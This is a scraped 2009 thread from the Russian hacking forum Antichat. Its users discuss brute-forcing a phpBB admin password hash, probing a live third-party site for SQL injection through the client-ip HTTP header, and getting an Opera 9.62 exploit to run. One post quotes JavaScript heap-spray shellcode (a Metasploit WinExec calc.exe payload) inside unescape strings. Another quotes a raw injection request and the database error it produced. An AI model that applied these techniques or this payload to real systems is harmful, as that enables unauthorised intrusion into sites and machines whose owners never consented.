Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

10.07.2009, 10:29
|
|
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме: 347165
Репутация:
-67
|
|
Сообщение от nub-hacker
Извините за глупый вопрос. Сколько символов минимальная длинна пароля в phpBB 2.0.17. Просто есть хэш админа и надо поставить на брут на ночь. Вот чтобы не брутить лишние надо узнать мин.длинну.
// Без ответа
|
|
|
SQL через header возможно ли это? |

10.07.2009, 10:34
|
|
Познающий
Регистрация: 26.12.2008
Сообщений: 42
Провел на форуме: 211850
Репутация:
59
|
|
SQL через header возможно ли это?
Всем еще раз доброго дня.
У меня вопрос к специалистам по SQL-inj:
Тестировал один сайт на уязвимости с помощью Acunetix и он показал что определенное место предположительно уязвимо под sql инъекцию.
Но проблема в том, что меняется параметр client-ip из http header в него подставляется ' и сервер выдает
Query:
Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1247058998'' at line 1
(это все отображается при запуске указаннрй уязвимости через HTTP Editor, как я понял он изменяет данные служебного заголовка)
Если забивать в строку URL путь до якобы уязвимого php файлика, идет автоматическая переадресация.
Так вот, если кто знает как такую штуку возможно раскрутить, если вообще возможо,
в частности, можно ли этот client-ip передать через url браузера (как при обычных sql-inj)?
Буду крайне признателен за совет!
Последний раз редактировалось genadiez; 10.07.2009 в 13:00..
|
|
|

10.07.2009, 11:12
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме: 1174919
Репутация:
229
|
|
2nub-hacker, ты прежде чем написать хотя бы попробовал что-нибудь предпринять. Ты мог бы уже раз 150 установить Denwer, поставить нужную phpbb и проверить допустимое количество символов при реге, убедившись, что там минимальное значение один символ.
|
|
|

10.07.2009, 11:59
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Сообщение от geezer.code
насколько я понимаю в этих сплоитах(я понимаю не очень много)
evil используется только для того чтобы вылезти из памяти приложения, то есть вызвать переполнение/overflow.
сама же начинка лежит в переменной shellcode где и происходит вызов calc.exe
upd по коду обрати внимание на комментарии
особенно тут
Код:
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
Даже если я оставляю сплоит "как есть" - он не вызывает калькулятор. Он подгружает систему и останавливается.
Все дело, в "unescape".
Попробовал сам расшифровывать - либо вбито от балды, либо защита стоит двойная.
|
|
|

10.07.2009, 12:07
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме: 1996429
Репутация:
468
|
|
Сообщение от genadiez
Всем еще раз доброго дня.
У меня вопрос к специалистам по SQL-inj:
Тестировал один сайт на уязвимости с помощью Acunetix и он показал что определенное место предположительно уязвимо под sql инъекцию. Но проблема в том, что меняется параметр client-ip из http header.
Если забивать в строку URL путь до якобы уязвимого php файлика, идет автоматическая переадресация, и сайт показывает Error! Please try again later.
Так вот, если кто знает как такую штуку возможно раскрутить, если вообще возможо, буду крайне признателен за совет!
Юзай SIPT
|
|
|

10.07.2009, 12:37
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Krist_ALL
Юзай SIPT
Правильно, сначала сканер, потом СИПТ. Прямой путь к деградации.
genadiez Мой тебе совет -
Пока не научишься понимать как это работает, вообще не пользуйся никакими программами и скриптами.
Конкретно по твоему случаю:
Сканер может ошибаться.
Надо смотреть линк.
|
|
|

10.07.2009, 12:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
Сообщение от Ershik
Даже если я оставляю сплоит "как есть" - он не вызывает калькулятор. Он подгружает систему и останавливается.
Все дело, в "unescape".
Попробовал сам расшифровывать - либо вбито от балды, либо защита стоит двойная.
Дорогой друг! (=
1. уверены ли Вы что у Вас уязвимая версия оперы, а именно 9.62?
2. Насколько хорошо Вы понимаете принципы работы программ( ну там адресация памяти, машинные инструкции)? Почему вы так уверены, что там просто строка "calc.exe" вбита? ))
3. это конечно PoC, но возможно и в нем есть защита от киддисов.
к сожалению это всё мои домыслы, ибо проверить не могу нет ни подходящей оперы, ни винды.
upd
вот в эту тему советую заглянуть https://forum.antichat.ru/threadnav128650-1-10.html
Последний раз редактировалось geezer.code; 10.07.2009 в 16:38..
|
|
|

10.07.2009, 12:48
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 1
Провел на форуме: 11644
Репутация:
-1
|
|
как найти XSS подскажите народ
|
|
|

10.07.2009, 12:48
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме: 1996429
Репутация:
468
|
|
Jokster, +1 , но он не знал как подменить заголовок, я ему подсказал. А так верно, нада понимать почему сканер орет и как это РУКАМИ заюзать.
|
|
|

10.07.2009, 14:45
|
|
Познающий
Регистрация: 26.12.2008
Сообщений: 42
Провел на форуме: 211850
Репутация:
59
|
|
SQL-inj into headers
Сообщение от Krist_ALL
Jokster, +1 , но он не знал как подменить заголовок, я ему подсказал. А так верно, нада понимать почему сканер орет и как это РУКАМИ заюзать.
Спасибо за ответ, однако
SIPT не видит там уязвимого места
А воспользовавшись HTTP Editor посылаю на сервак запрос
GET /xxx/feedback/mail.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: somehost.com
Connection: Close
client-ip: '
Pragma: no-cache
получаю в ответ
A fatal MySQL error occured
Query:
Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND time > '1247218524'' at line 1
В случае подстановки вместо ' в client-ip любого другого значения идет переадресация на error.shtml
(также и в случае запроса через URL http://somehost.com/xxx/feedback/mail.php)
Скажите мне пожалуйста, через данный header можно скуль реализовать?
Последний раз редактировалось genadiez; 10.07.2009 в 15:09..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|